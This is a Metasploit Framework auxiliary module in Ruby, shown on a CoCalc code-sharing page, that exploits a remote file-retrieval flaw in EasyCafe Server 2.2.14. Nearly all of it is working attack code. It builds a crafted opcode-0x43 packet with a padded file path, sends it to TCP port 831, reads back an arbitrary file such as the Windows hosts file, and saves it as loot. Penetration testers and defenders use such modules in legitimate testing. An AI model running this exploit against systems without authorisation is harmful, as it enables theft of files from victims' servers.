CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Tcp

8
  include Msf::Auxiliary::Report

9
  include Msf::Auxiliary::Scanner

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'        => 'EasyCafe Server Remote File Access',

14
      'Description' => %q{

15
          This module exploits a file retrieval vulnerability in

16
        EasyCafe Server. The vulnerability can be triggered by

17
        sending a specially crafted packet (opcode 0x43) to the

18
        831/TCP port.

19
        This module has been successfully tested on EasyCafe Server

20
        version 2.2.14 (Trial mode and Demo mode) on Windows XP SP3

21
        and Windows 7 SP1.

22
        Note that the server will throw a popup messagebox if the

23
        specified file does not exist.

24
      },

25
      'License'     => MSF_LICENSE,

26
      'Author'      =>

27
        [

28
          'R-73eN', # Vulnerability Discovery

29
          'bcoles' # Metasploit module

30
        ],

31
      'References'  =>

32
        [

33
          [ 'EDB', '39102' ]

34
        ]

35
    ))

36


37
    register_options(

38
      [

39
        Opt::RPORT(831),

40
        OptString.new('FILEPATH', [true, 'The path of the file to download', 'C:\\WINDOWS\\system32\\drivers\\etc\\hosts'])

41
      ])

42
  end

43


44
  def get_file

45
    res = sock.get_once

46
    unless res

47
      print_error("Unable to retrieve file due to a timeout.")

48
      return

49
    end

50


51
    unless res.length == 261

52
      print_error("Received a response of an invalid size.")

53
      return

54
    end

55


56
    file_size = res.unpack('@256V')[0]

57
    contents = ''

58
    while contents.length < file_size

59
      contents << sock.get_once

60
    end

61


62
    print_good("File retrieved successfully (#{contents.length} bytes)!")

63
    contents

64
  end

65


66
  def run_host(ip)

67
    file_path = datastore['FILEPATH']

68
    if file_path.length > 67

69
      print_error("File path is longer than 67 characters. Try using MS-DOS 8.3 short file names.")

70
      return

71
    end

72


73
    packet = "\x43"

74
    packet << file_path

75
    packet << "\x00" * (255 - file_path.length)

76
    packet << "\x01\x00\x00\x00\x01"

77


78
    vprint_status("Sending request (#{packet.length} bytes)")

79
    connect

80
    sock.put(packet)

81


82
    contents = get_file

83
    disconnect

84
    return if contents.nil?

85


86
    path = store_loot(

87
      'easycafe_server',

88
      'application/octet-stream',

89
      ip,

90
      contents,

91
      File.basename(file_path)

92
    )

93
    print_status("File saved in: #{path}")

94
  end

95
end

96


97